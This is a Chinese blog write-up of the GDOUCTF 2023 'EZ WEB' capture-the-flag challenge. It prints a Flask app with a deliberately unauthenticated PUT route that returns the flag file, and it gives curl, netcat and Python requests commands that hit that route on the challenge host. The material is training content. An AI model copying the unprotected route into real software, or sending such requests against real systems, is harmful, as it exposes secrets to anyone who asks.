[GDOUCTF 2023]EZ WEB

最新推荐文章于 2024-07-09 23:44:56 发布
最新推荐文章于 2024-07-09 23:44:56 发布
阅读量370 收藏 9
点赞数 9
分类专栏: ctf-web 文章标签: 前端 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionkas/article/details/136128195
版权
本文讲述了在GDOUCTF2023竞赛中,通过分析EZWEB网页源码和Flask应用,发现PUT方法漏洞,利用BurpSuite、Netcat、Curl和Python发送PUT请求获取隐藏的flag的过程,强调了PUT请求在Web安全中的潜在风险。
摘要由CSDN通过智能技术生成

Problem: [GDOUCTF 2023]EZ WEB

思路

  • 查看网页源码,提示访问 /src
<!DOCTYPE html>
<html>
<head>
<title>index</title>
<script>
  function start() {
    alert("Where's the flag? i swear it was around here somewhere");
  }
</script>
</head>
<body>
<button onclick='start()'>click me for the flag</button>
<!-- /src -->
</body>
</html>
  • 访问/src,得到app.py文件
import flask

app = flask.Flask(__name__)

@app.route('/', methods=['GET'])
def index():
  return flask.send_file('index.html')

@app.route('/src', methods=['GET'])
def source():
  return flask.send_file('app.py')

@app.route('/super-secret-route-nobody-will-guess', methods=['PUT'])
def flag():
  return open('flag').read()
  • 对app.py代码审计,发现使用PUT方法,访问/super-secret-route-nobody-will-guess路径,可以得到flag

EXP1

  • 利用Burp Suite,将http改为PUT
    在这里插入图片描述

EXP2

  • 利用Netcat工具
nc node5.anna.nssctf.cn 28045
PUT /super-secret-route-nobody-will-guess HTTP/1.1

EXP3

  • 利用curl命令
  • curl -i -X PUT http://node5.anna.nssctf.cn:28045/super-secret-route-nobody-will-guess

EXP4

  • 利用python发送put请求
import requests
r = requests.put('http://node5.anna.nssctf.cn:28045/super-secret-route-nobody-will-guess')
print(r.text)

总结

  • GET向指定的URL请求资源,可携带参数(明文)。
  • POST向指定的URL提交资源,表单数据提交,数据进行封装(比Get方法安全)。
  • PUT与POST类似,通常用于对资源数据的更新修改。
  • PUT是用来传输文件的,它会将文件内容包含在请求报文的主体当中,然后将内容保存到指定的uri指定的位置上,不带自身验证的功能,任何人都可以通过PUT上传文件,这样就会导致不安全的因素,所以很多网站都会禁止使用该方法。
  • DELETE删除指定的资源,和PUT大致一样,同样不具备验证功能,如果想要使用要建立中间桥接机制进行验证,验证之后在进行DELETE操作。
梦想oO天堂
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
ez_setup.py
05-26
"ez_setup.py" 是一个在Python环境中用于安装setuptools的脚本文件。setuptools是Python的一个重要库,它提供了一套全面的工具集,用于管理、构建、打包和部署Python项目。这个脚本通常用于在没有其他包管理器(如...
[GDOUCTF 2023]EZ WEB 学习笔记
ZhangAweio的博客
04-26 651
其中 '/super-secret-route-nobody-will-guess' 路由返回的内容可能是敏感信息。看到题目没啥提示,说他保证flag就在附近。那我们只需要抓包、改包发送PUT请求就行了。发现了个提示的文件/src 我们打开它。我们F12查看源码看看有啥有用的东西。
GDOUCTF2023-web-wp
adorkablezhenbai的博客
04-16 839
今天和别人交流了一下,发现自己还有很长的路要走。
GDCTF2023 web wp
m0_63441547的博客
04-16 466
显然考察的是ssti的知识,过滤了很多东西我就不一个个试了,这道题目跟ctfshow里面的ssti369很类似,大家可以去看看,我推荐这篇文章。修改得分处score,因为是除号,所以要把值1000改得小一点,这样我们得到的分数就会很大。(2).cookie传参,可以下载一些插件,比如cookie-editor。数组,在加密数组的时候会返回NULL,所以我们可以post传入两个数组。小白作者的第一篇博客,不会写,各位佬轻喷(😂~~~),写的很详细很清楚,我在这就不罗嗦了直接打。(1). 由于md5不能。
Lantronix EZ-Web Config
08-20
Lantronix EZ-Web Config software
unity ez camera shake资源包
01-05
Unity EZ Camera Shake资源包是一个专为Unity引擎设计的插件,用于实现动态和逼真的相机抖动效果。这个工具使得开发者无需深入复杂的物理模拟或动画编程,就能在游戏或交互式应用中快速添加各种相机晃动效果,如爆炸...
EZ-Cube仿真器驱动程序
02-13
EZ-Cube仿真器驱动程序是专为瑞萨电子公司(Renesas)的单片机设计的一款重要软件组件。在嵌入式系统开发过程中,仿真器扮演着至关重要的角色,它能够帮助开发者在硬件实际生产前对代码进行调试和测试。EZ-Cube驱动...
[GDOUCTF 2023] ——web方向全Write up
Leaf_initial的博客
04-17 2141
魔术方法,然后可以看到__wakeup()中会指向classroom类的hahaha函数,hahaha所需要的变量条件在school类的。把`’ [] " _ {{}} \ .都过滤了但是比较幸运的是可以用{%%},看了看他的config和self,发现都可以用。test.txt也看过了,里面和/orzorz.php中的内容一样,不过是文档形式,这里不赘述。可以看出这个通过flask框架写的一个网页,通过代码审计我们可以得知,只需要向。所以,双等号是不要求类型相同的,所以我们可以构造payload。
GDOUCTF web部分题解 2023
Jay17的博客
04-16 1923
GDOUCTF web部分题解 2023 (已加上NSS另外两题)
[GDOUCTF 2023] 部分web题解
qq_44640313的博客
04-18 1548
GDOUCTF 2023,主要见识了fenjing的使用
WEB-PUT练习
摘星怪sec的blog
04-25 196
可以看出,第三个路由是一个秘密路由,只有当请求方法为 PUT 并且路径为 "/super-secret-route-nobody-will-guess" 时才能访问。这可能是一个漏洞,因为未对该路由进行身份验证或授权检查,攻击者可以通过篡改 HTTP 请求来绕过安全控制,获取敏感信息或执行恶意操作。路由:使用 PUT 方法打开名为 "flag" 的文件并将其中的内容返回给客户端。用bp抓包,改一下请求方式,然后改文件路径在发包,就返回falg了。方法可以用于上传或更新文件,也可以用于创建新的资源。
GDOUCTF2023-misc方向WP
toto的博客
04-16 1979
有问题或交流可联系Q:2282679004。
WHAT - NextJS 的路由系统和 react-router-dom
weixin_58540586的博客
07-04 933
不,Next.js 的路由系统并不基于。Next.js 本身内置了自己的路由系统,并且在其生命周期和工作方式上与有所不同。
Javafx利用fxml变换场景的小细节
最新发布
2301_80311013的博客
07-09 503
在这个代码中,在JavaFX中,FXMLLoader是用来加载FXML文件并将其转换为Java对象(例如控制器类)的工具。当您使用FXMLLoaderFXMLLoader在整个过程中,FXMLLoader是使用JavaFX的后台线程(也称为JavaFX线程)来执行这些操作的,这是为了保持UI线程的响应性。这意味着在用户界面(UI)线程中,您不会看到任何阻塞,即使FXMLLoader正在执行耗时的操作。当FXMLLoader完成加载并调用load()方法时,它会返回一个Parent。
HTML_表单 和 表单案例
secret010的博客
07-05 275
【代码】HTML_表单 和 表单案例。
前端javascript中的排序算法之插入排序
峰会路转的博客
07-09 90
【代码】前端javascript中的排序算法之插入排序。
UNCTF2021 部分wp.pdf
12-10
unctf2021

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值